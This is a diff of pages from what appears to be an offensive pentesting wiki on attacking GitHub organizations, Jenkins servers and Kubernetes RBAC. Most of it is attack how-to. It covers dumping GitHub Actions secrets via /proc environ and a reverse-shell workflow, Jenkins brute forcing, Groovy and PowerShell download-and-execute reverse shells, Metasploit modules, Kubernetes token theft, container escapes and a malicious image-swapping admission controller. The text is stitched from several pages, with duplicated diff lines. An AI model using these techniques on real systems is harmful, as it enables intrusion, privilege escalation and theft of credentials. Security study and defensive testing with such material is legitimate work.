@@ -131,7 +129,7 @@ An attacker might create a **malicious Github Application** to access privileged

Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
## Enumerate Webhooks

**Webhooks** are able to **send specific github information to some places**. You might be able to **exploit that communication**.\
However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users who know the URL of the webhook but not the secret from **exploiting that webhook**.\
@@ -139,17 +137,17 @@ But in some occasions, people instead of setting the **secret** in its place, th

Webhooks can be set at **repo and at org level**.
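To illustrate why that secret matters: Github signs each webhook delivery with an HMAC-SHA256 of the body using the configured secret and sends it in the `X-Hub-Signature-256` header, which the receiver recomputes. A minimal sketch of the computation (the secret and body values here are made up):

```shell
SECRET='s3cr3t'                     # hypothetical webhook secret
BODY='{"action":"opened"}'          # hypothetical delivery body

# GitHub sends: X-Hub-Signature-256: sha256=HMAC_SHA256(secret, body)
SIG=$(printf '%s' "$BODY" | openssl dgst -sha256 -hmac "$SECRET" | awk '{print $NF}')
echo "X-Hub-Signature-256: sha256=$SIG"
```

Without the secret you cannot produce a valid signature, so a receiver that checks this header cannot be abused just by knowing the URL.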
## With Malicious Github Action

For an introduction about [**Github Actions check the basic information**](basic-github-information.md#git-actions).

In case you can **execute arbitrary github actions** in a **repository**, you can **steal the secrets from that repo**.
### Github Action Execution from Repo Creation

In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**.
### Github Action from a New Branch

If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know their names).
@@ -168,7 +166,7 @@ on:

# Use '**' instead of a branch name to trigger the action in all the branches
```
### Github Action Injection/Backdoor

In case you somehow managed to **infiltrate inside a Github Action**, if you can escalate privileges you can **steal secrets from the processes where they have been set**. In some cases you don't even need to escalate privileges.
@@ -177,7 +175,7 @@ cat /proc/<proc_number>/environ

cat /proc/*/environ | grep -i secret #Supposing the env variable name contains "secret"
```
### GITHUB\_TOKEN

This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given by default read and **write permissions** **to the repo**. This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
@@ -217,7 +215,7 @@ curl -X POST \

Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization.
{% endhint %}
### List secrets in Github Action output

```yaml
name: list_env
@@ -241,7 +239,7 @@ jobs:

secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORD}}
```
### Get reverse shell with secrets

```yaml
name: revshell
@@ -264,7 +262,7 @@ jobs:

secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORD}}
```
## Branch Protection Bypass

* **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB\_TOKEN** you might be able to **approve your PR** and get 1 approval this way.
* _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are able to, you can abuse it to accept your PRs._
@@ -278,7 +276,7 @@ jobs:

* **Bypassing push protections**: If a repo **only allows certain users** to push (merge code) to branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
* If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.
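The GITHUB\_TOKEN approval trick mentioned above boils down to one call against the pull-request reviews endpoint; a hedged sketch, run from inside a workflow (the owner, repo and PR number are placeholders):

```bash
# Approve "your own" PR using the workflow's GITHUB_TOKEN
curl -s -X POST \
  -H "Authorization: token $GITHUB_TOKEN" \
  -H "Accept: application/vnd.github+json" \
  https://api.github.com/repos/target-org/target-repo/pulls/1/reviews \
  -d '{"event":"APPROVE"}'
```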
## Bypass Environments Protections

For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).
@@ -294,7 +292,7 @@ Note, that you might find the edge case where **all the branches are protected**

Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.
# Persistence

* Generate **user token**
* Steal **github tokens** from **secrets**
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>
# Basic Structure
The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations**, each of which may contain **several repositories** and **several teams**. Smaller companies may just **own one organization and no enterprises**.
@@ -29,14 +27,14 @@ Moreover, a user may be **part of different teams** with different enterprise, o

And finally **repositories may have special protection mechanisms**.
# Privileges

## Enterprise Roles

* **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
* **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
## Organization Roles

In an organisation users can have different roles:
@@ -50,7 +48,7 @@ In an organisation users can have different roles:

You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
## Members Privileges

In _https://github.com/organizations/\<org\_name>/settings/member\_privileges_ you can see the **permissions users will have just for being part of the organisation**.
@@ -64,7 +62,7 @@ The settings here configured will indicate the following permissions of members

* The permissions admins have over the repositories
* If members can create new teams
## Repository Roles

By default these repository roles are created:
@@ -78,39 +76,39 @@ You can **compare the permissions** of each role in this table [https://docs.git

You can also **create your own roles** in _https://github.com/organizations/\<org\_name>/settings/roles_
## Teams

You can **list the teams created in an organization** in _https://github.com/orgs/\<org\_name>/teams_. Note that to see the teams which are children of other teams you need to access each parent team.

![](<../../.gitbook/assets/image (630) (1).png>)
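The same enumeration can be done through the REST API; a hedged sketch (the org and team names are placeholders, and a token with the `read:org` scope is assumed):

```bash
# List an organization's teams
curl -s -H "Authorization: token $TOKEN" \
  https://api.github.com/orgs/target-org/teams | jq '.[].slug'

# List the members of one team
curl -s -H "Authorization: token $TOKEN" \
  https://api.github.com/orgs/target-org/teams/devs/members | jq '.[].login'
```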
## Users

The users of an organization can be **listed** in _https://github.com/orgs/\<org\_name>/people._

In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
# Github Authentication

Github offers different ways to authenticate to your account and perform actions on your behalf.
## Web Access

Accessing **github.com** you can login using your **username and password** (and potentially **2FA**).
## **SSH Keys**

You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys)
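If you find a candidate private key, a quick way to check whether it is linked to a Github account (the key path is hypothetical):

```bash
# Test a found private key against Github over SSH
ssh -i /path/to/found_key -o IdentitiesOnly=yes -T git@github.com
```

On success Github replies with a greeting naming the account the key belongs to, which also tells you whose repos you can now reach.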
### **GPG Keys**

You **cannot impersonate the user with these keys**, but if you don't use them it might be possible that you **get discovered for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
## **Personal Access Tokens**

You can generate a personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** the **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens)
## Oauth Applications

Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
@@ -127,7 +125,7 @@ Some **security recommendations**:

* **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
## Github Applications

Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
@@ -149,19 +147,19 @@ Some security recommendations:

* If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
## Deploy keys

Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
## Github Actions

This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information.
# Git Actions

Git actions allow you to automate the **execution of code when an event happens**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets).
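For illustration, a minimal (hypothetical) workflow of this kind, stored as a file under `.github/workflows/`, that runs on every push:

```yaml
# .github/workflows/ci.yml — hypothetical minimal action
name: ci
on: push
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: echo "Building commit $GITHUB_SHA"
```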
## Configuration

In _https://github.com/organizations/\<org\_name>/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
@@ -169,7 +167,7 @@ It's possible to disallow the use of github actions completely, **allow all gith

It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the `GITHUB_TOKEN` of a Github Action when it's run**.
## Git Secrets

Github Actions usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allows you to store them as **Secrets**.
@@ -184,7 +182,7 @@ steps:

super_secret: ${{ secrets.SuperSecret }}
```
### Example using Bash <a href="#example-using-bash" id="example-using-bash"></a>

```yaml
steps:
@@ -203,7 +201,7 @@ Once configured in the repo or the organizations **users of github won't be able

Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
## Git Environments

Github allows you to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like:
@@ -216,7 +214,7 @@ jobs:

You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.
## Git Action Box

A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user.
@@ -230,7 +228,7 @@ It's **not possible to run a Github Action of an organization inside a self host

If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with.
## Git Action Compromise

If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed.
@@ -242,7 +240,7 @@ A **malicious Github Action** run could be **abused** by the attacker to:

* **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**.
{% endhint %}
# Branch Protections

Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
@@ -271,7 +269,7 @@ Different protections can be applied to a branch (like to master):

As you can see, even if you managed to obtain some credentials of a user, **repos might be protected preventing you from pushing code to master**, for example, to compromise the CI/CD pipeline.
{% endhint %}
## References # References
* [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization) * [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization)
* [https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise) * [https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)
@@ -17,14 +17,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>

# Basic Information

Jenkins offers a simple way to set up a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **languages** and source code repositories using pipelines, as well as automating other routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does give you a faster and more robust way to integrate your entire chain of build, test, and deployment tools than you can easily build yourself.\
Definition from [here](https://www.infoworld.com/article/3239666/what-is-jenkins-the-ci-server-explained.html).

# Unauthenticated Enumeration

In order to search for interesting Jenkins pages without authentication (like _/people_ or _/asynchPeople_, which lists the current users) you can use:

@@ -44,12 +42,12 @@ You may be able to get the Jenkins version from the path _**/oops**_ or _**/erro

![](<../.gitbook/assets/image (415).png>)

# Login

You will be able to find Jenkins instances that **allow you to create an account and log in. As simple as that.**\
Also if **SSO functionality**/**plugins** are present, then you should attempt to **log in** to the application using a test account (i.e., a test **GitHub/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).

## Bruteforce

**Jenkins** does **not** implement any **password policy** or username **brute-force mitigation**. Therefore, you **should** always try to **brute-force** users, because **weak passwords** are probably being used (even **usernames as passwords** or **reversed** usernames as passwords).

@@ -57,33 +55,33 @@ Also if **SSO** **functionality**/**plugins** were present then you should attem

```
msf> use auxiliary/scanner/http/jenkins_login
```
# Jenkins Abuses

## Known Vulnerabilities

{% embed url="https://github.com/gquere/pwn_jenkins" %}

## Dumping builds to find cleartext secrets

Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/dump\_builds/jenkins\_dump\_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets.

## Password spraying

Use [this python script](https://github.com/gquere/pwn\_jenkins/blob/master/password\_spraying/jenkins\_password\_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).

## Decrypt Jenkins secrets offline

Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/offline\_decryption/jenkins\_offline\_decrypt.py) to decrypt previously dumped secrets.

## Decrypt Jenkins secrets from Groovy

```
println(hudson.util.Secret.decrypt("{...}"))
```
# Code Execution

## **Create a new project**

This method is very noisy because you have to create a whole new project (obviously this will only work if your user is allowed to create a new project).

@@ -104,7 +102,7 @@ If you are allowed to configure the project you can **make it execute commands w

Click on **Save** and **build** the project and your **command will be executed**.\
If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.

## **Execute Groovy script**

Best way. Less noisy.

@@ -132,7 +130,7 @@ proc.waitForOrKill(1000)

```
println "out> $sout err> $serr"
```
## Reverse shell in linux

```groovy
def sout = new StringBuffer(), serr = new StringBuffer()
@@ -142,7 +140,7 @@ proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```

## Reverse shell in windows

You can prepare an HTTP server with a PS reverse shell and use Jenkins to download and execute it:

@@ -152,7 +150,7 @@ echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0

```
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
```
## MSF exploit

You can use MSF to get a reverse shell:

@@ -160,15 +158,15 @@ You can use MSF to get a reverse shell:

```
msf> use exploit/multi/http/jenkins_script_console
```

# POST

## Metasploit

```
msf> post/multi/gather/jenkins_gather
```
## Files to copy after compromise

These files are needed to decrypt Jenkins secrets:

@@ -186,7 +184,7 @@ Here's a regexp to find them:

```
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
```

# References

{% embed url="https://github.com/gquere/pwn_jenkins" %}
@@ -17,12 +17,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>
# Abusing Roles/ClusterRoles in Kubernetes
Here you can find some potentially dangerous Roles and ClusterRoles configurations.\
Remember that you can get all the supported resources with `kubectl api-resources`

# **Privilege Escalation**

Privilege escalation here refers to the art of **getting access to a different principal** within the cluster **with different privileges** (within the Kubernetes cluster or in external clouds) than the ones you already have. In Kubernetes there are basically **4 main techniques to escalate privileges**:

@@ -32,7 +30,7 @@ Referring as the art of getting **access to a different principal** within the c

* Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
* A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod.
## **Access Any Resource or Verb**

This privilege provides access to **any resource with any verb**. It is the most substantial privilege that a user can get, especially if it is also a “ClusterRole.” If it's a “ClusterRole,” then the user can access the resources of any namespace and own the cluster with that permission.

@@ -48,7 +46,7 @@ rules:

```
verbs: ["*"]
```

## **Access Any Resource**

Giving a user permission to **access any resource can be very risky**. But **which verbs** allow access to these resources? Here are some dangerous RBAC permissions that can damage the whole cluster:

@@ -68,7 +66,7 @@ rules:

```
verbs: ["create", "list", "get"]
```
## Pod Create - Steal Token

An attacker with permission to create a pod in the “kube-system” namespace can create cryptomining containers, for example. Moreover, if there is a **service account with privileged permissions, by running a pod with that service account the permissions can be abused to escalate privileges**.

@@ -105,7 +103,7 @@ So just create the malicious pod and expect the secrets in port 6666:

![](<../../../.gitbook/assets/image (464).png>)
## **Pod Create & Escape**

The following definition gives all the privileges a container can have:

@@ -170,7 +168,7 @@ Now that you can escape to the node check post-exploitation techniques in:

[attacking-kubernetes-from-inside-a-pod.md](../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)

{% endcontent-ref %}

### Stealth

You probably want to be **stealthier**; in the following pages you can see what you would be able to access if you create a pod enabling only some of the privileges mentioned in the previous template:

@@ -183,7 +181,7 @@ You probably want to be **stealthier**, in the following pages you can see what

_You can find examples of how to create/abuse the previous privileged pod configurations in_ [_https://github.com/BishopFox/badPods_](https://github.com/BishopFox/badPods)
## Pod Create - Move to cloud

If you can **create** a **pod** (and optionally a **service account**) you might be able to **obtain privileges in the cloud environment** by **assigning cloud roles to a pod or a service account** and then accessing it.\
Moreover, if you can create a **pod with the host network namespace** you can **steal the IAM role** of the **node** instance.

@@ -194,7 +192,7 @@ For more information check:

[kubernetes-access-to-other-clouds.md](../kubernetes-access-to-other-clouds.md)

{% endcontent-ref %}

## **Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**

Deployments, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible to use all of them to **develop pods and even create pods**. So it's possible to **abuse them to escalate privileges just like in the previous example.**
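For instance, a minimal sketch of a Job that spawns a pod running under a target service account and dumps its token (all names here are hypothetical placeholders, not values from the walkthrough):

```yaml
# Hypothetical example: a Job whose pod runs as a privileged SA and prints its token
apiVersion: batch/v1
kind: Job
metadata:
  name: steal-token-job        # placeholder name
  namespace: kube-system       # namespace of the target SA
spec:
  template:
    spec:
      serviceAccountName: privileged-sa   # target service account (placeholder)
      restartPolicy: Never
      containers:
      - name: alpine
        image: alpine
        command: ["cat", "/var/run/secrets/kubernetes.io/serviceaccount/token"]
```

The token then appears in the Job's pod logs (`kubectl logs`), readable with the same task-creation privileges.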
@@ -233,7 +231,7 @@ Kubernetes API documentation indicates that the “**PodTemplateSpec**” endpoi

**So, the privilege to create or update tasks can also be abused for privilege escalation in the cluster.**

## **Pods Exec**

**Pod exec** is an option in kubernetes used for **running commands in a shell inside a pod**. This privilege is meant for administrators who want to **access containers and run commands**. It's just like creating an SSH session for the container.

@@ -245,7 +243,7 @@ kubectl exec -it <POD_NAME> -n <NAMESPACE> -- sh

Note that as you can get inside any pod, you can abuse other pods' tokens just like in [**Pod Creation exploitation**](./#pod-creation) to try to escalate privileges.

## port-forward

This permission allows you to **forward one local port to one port in the specified pod**. It is meant to make it easy to debug applications running inside a pod, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable applications (webs?) inside a pod:

@@ -253,7 +251,7 @@ This permission allows to **forward one local port to one port in the specified

```
kubectl port-forward pod/mypod 5000:5000
```
## **Hosts Writable /var/log/ Escape**

As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html), if you can access or create a pod with the **host's `/var/log/` directory mounted** on it, you can **escape from the container**.\
This is basically because when the **Kube-API tries to get the logs** of a container (using `kubectl logs <pod>`), it **requests the `0.log`** file of the pod using the `/logs/` endpoint of the **Kubelet** service.\

@@ -287,7 +285,7 @@ curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://

**A laboratory and automated exploit can be found in** [**https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts**](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts)
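The core of the trick is that the log-serving endpoint follows symlinks planted under the writable log directory. A toy, self-contained sketch of why that matters (temp directories stand in for the host filesystem; no cluster involved):

```python
import os
import tempfile

# Stand-ins for the host filesystem and the pod's writable log directory.
host_root = tempfile.mkdtemp()                      # plays the role of the host "/"
secret_file = os.path.join(host_root, "etc_shadow")
with open(secret_file, "w") as f:
    f.write("root:$6$fakehash")                     # a "sensitive" host file

pod_logs = os.path.join(host_root, "var", "log", "pods", "mypod")
os.makedirs(pod_logs)

# The attacker, who can write to the mounted log dir, plants a symlink to "/".
os.symlink(host_root, os.path.join(pod_logs, "root_link"))

# A file server that naively joins paths and follows symlinks (as the kubelet's
# /logs/ endpoint does per the research above) will then serve any host file:
requested = os.path.join(pod_logs, "root_link", "etc_shadow")
leaked = open(requested).read()
print(leaked)
```

In the real attack the symlink is created from inside the pod and the file is fetched through the kubelet with the `curl` request shown above.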
### Bypassing readOnly protection <a href="#bypassing-hostpath-readonly-protection" id="bypassing-hostpath-readonly-protection"></a>

If you are lucky enough and the highly privileged capability `CAP_SYS_ADMIN` is available, you can just remount the folder as rw:

@@ -295,7 +293,7 @@ If you are lucky enough and the highly privileged capability capability `CAP_SYS

```
mount -o rw,remount /hostlogs/
```

### Bypassing hostPath readOnly protection <a href="#bypassing-hostpath-readonly-protection" id="bypassing-hostpath-readonly-protection"></a>

As stated in [**this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html) it's possible to bypass the protection:

@@ -353,7 +351,7 @@ spec:

```
name: task-pv-storage-vol
```
## **Impersonating privileged accounts**

With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) privilege, an attacker could impersonate a privileged account.

@@ -377,7 +375,7 @@ curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" \

```
https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
```

## **Listing Secrets**

The **listing secrets privilege** is a strong capability to have in the cluster. A user with the permission to list secrets can **potentially view all the secrets in the cluster, including the admin keys**. The secret key is a JWT token encoded in base64.

@@ -391,7 +389,7 @@ curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1

![](https://www.cyberark.com/wp-content/uploads/2019/08/Kube-Pentest-Fig-2.png)
## **Reading a secret brute-forcing token IDs**

An attacker that found a token with permission to read a secret can't use this permission without knowing the full secret's name. This permission is different from the _**listing secrets**_ permission described above.

@@ -419,7 +417,7 @@ This means that there are 27⁵ = 14,348,907 possibilities for a token.

An attacker can run a brute-force attack to guess the token ID in a couple of hours. Succeeding in getting secrets from default sensitive service accounts will allow him to escalate privileges.
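A quick sanity check of that keyspace, and a sketch of candidate generation (assuming a 5-character ID over a 27-character alphabet as stated above; the exact alphabet string and the `default-token-` prefix are assumptions for illustration):

```python
import itertools

# Assumed 27-character alphabet for the random token-ID suffix (hypothetical;
# adjust to the alphabet observed in your target's secret names).
ALPHABET = "bcdfghjklmnpqrstvwxz2456789"
ID_LEN = 5

keyspace = len(ALPHABET) ** ID_LEN
print(keyspace)  # 14348907 possible IDs, matching 27^5 above

# Lazily generate candidate secret names to try against the read permission:
candidates = (
    "default-token-" + "".join(chars)
    for chars in itertools.product(ALPHABET, repeat=ID_LEN)
)
first = next(candidates)
print(first)  # default-token-bbbbb
```

Each candidate name would then be tried against the `/api/v1/namespaces/<ns>/secrets/<name>` endpoint with the compromised token.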
# Built-in Privileged Escalation Prevention

Although there can be risky permissions, Kubernetes is doing good work preventing other types of permissions with potential for privilege escalation.

@@ -445,7 +443,7 @@ After trying to do so, we will receive an error “forbidden: attempt to grant e

![](https://www.cyberark.com/wp-content/uploads/2018/12/forbidden\_attempt\_to\_gran\_extra\_privileges\_message-1024x288.png)

## **Get & Patch RoleBindings/ClusterRoleBindings**

{% hint style="danger" %}
**Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. You cannot create/modify a rolebinding to give yourself or a different SA privileges that you don't already have.**

@@ -501,13 +499,13 @@ curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>"\

```
https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret
```
# Other Attacks

## **Sidecar proxy app**

By default there isn't any encryption in the communication between pods, nor mutual authentication (two-way, pod to pod).

### Create a sidecar proxy app <a href="#create-a-sidecar-proxy-app" id="create-a-sidecar-proxy-app"></a>

Create your .yaml

@@ -552,7 +550,7 @@ kubectl logs app -C proxy

More info at: [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
## Malicious Admission Controller

An admission controller is a piece of code that **intercepts requests to the Kubernetes API server** before the persistence of the object, but **after the request is authenticated** **and authorized**.

@@ -596,7 +594,7 @@ kubectl describe po nginx | grep "Image: "

As you can see in the above image, we tried running image `nginx` but the final executed image is `rewanthtammana/malicious-image`. What just happened!?

### Technicalities <a href="#heading-technicalities" id="heading-technicalities"></a>

We will unfold what just happened. The `./deploy.sh` script that you executed created a mutating webhook admission controller. The below lines in the mutating webhook admission controller are responsible for the above results.

@@ -610,9 +608,9 @@ patches = append(patches, patchOperation{

The above snippet replaces the first container image in every pod with `rewanthtammana/malicious-image`.
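The effect of that Go snippet can be sketched as the JSONPatch operation the webhook returns, applied here by hand for illustration (a simplified model, not the controller's actual code):

```python
# A pod spec as the API server would pass it to the mutating webhook:
pod = {"spec": {"containers": [{"name": "nginx", "image": "nginx"}]}}

# The patch the malicious webhook responds with (RFC 6902 JSONPatch style):
patch = [{
    "op": "replace",
    "path": "/spec/containers/0/image",
    "value": "rewanthtammana/malicious-image",
}]

# Minimal manual application of the single replace operation:
op = patch[0]
parts = op["path"].strip("/").split("/")
target = pod
for key in parts[:-1]:
    target = target[int(key)] if key.isdigit() else target[key]
target[parts[-1]] = op["value"]

print(pod["spec"]["containers"][0]["image"])  # rewanthtammana/malicious-image
```

The API server applies this patch before persisting the object, which is why `kubectl describe` shows the swapped image.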
# Best Practices

## **Prevent service account token automounting on pods**

When a pod is being created, it automatically mounts a service account (the default is the default service account in the same namespace). Not every pod needs the ability to utilize the API from within itself.
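This is controlled with `automountServiceAccountToken: false`, settable on the ServiceAccount or on the pod spec (a minimal sketch; the names are placeholders):

```yaml
# On the ServiceAccount (applies to every pod using it):
apiVersion: v1
kind: ServiceAccount
metadata:
  name: build-robot            # placeholder name
automountServiceAccountToken: false
---
# Or per pod (the pod-level setting takes precedence):
apiVersion: v1
kind: Pod
metadata:
  name: my-pod                 # placeholder name
spec:
  serviceAccountName: build-robot
  automountServiceAccountToken: false
  containers:
  - name: app
    image: nginx
```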
@@ -626,15 +624,15 @@ It is also possible to use it on the pod:\\

![](https://www.cyberark.com/wp-content/uploads/2018/12/pod\_with\_autoamountServiceAccountToken\_false.png)

## **Grant specific users to RoleBindings\ClusterRoleBindings**

When creating RoleBindings\ClusterRoleBindings, make sure that only the users that need the role in the binding are included. It is easy to forget users that are not relevant anymore inside such groups.

## **Use Roles and RoleBindings instead of ClusterRoles and ClusterRoleBindings**

When using ClusterRoles and ClusterRoleBindings, they apply to the whole cluster. A user in such a group has permissions over all the namespaces, which is sometimes unnecessary. Roles and RoleBindings can be applied to a specific namespace and provide another layer of security.

## **Use automated tools**

{% embed url="https://github.com/cyberark/KubiScan" %}

@@ -642,7 +640,7 @@ When using ClusterRoles and ClusterRoleBindings, it applies on the whole cluster

{% embed url="https://github.com/aquasecurity/kube-bench" %}

# **References**

{% embed url="https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions" %}
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>
# K8s Roles Abuse Lab
You can run these labs just inside **minikube**. You can run these labs just inside **minikube**.
## Pod Creation -> Escalate to ns SAs # Pod Creation -> Escalate to ns SAs
We are going to create: We are going to create:
@ -128,7 +126,7 @@ kubectl delete role test-r
kubectl delete serviceaccount test-sa
```

# Create Daemonset

```bash
# Create Service Account test-sa
kubectl delete serviceaccount test-sa
```

## Patch Daemonset

In this case we are going to **patch a daemonset** to make its pod load our desired service account.
kubectl delete serviceaccount test-sa
```

# Doesn't work

## Create/Patch Bindings

**Doesn't work:**
kubectl delete serviceaccount test-sa2
```

## Bind explicitly Bindings

In the "Privilege Escalation Prevention and Bootstrapping" section of [https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/](https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/) it's mentioned that if a SA can create a Binding and has explicit Bind permissions over the Role/ClusterRole, it can create bindings even using Roles/ClusterRoles with permissions that it doesn't have.\
However, it didn't work for me:
kubectl delete serviceaccount test-sa2
```

## Arbitrary roles creation

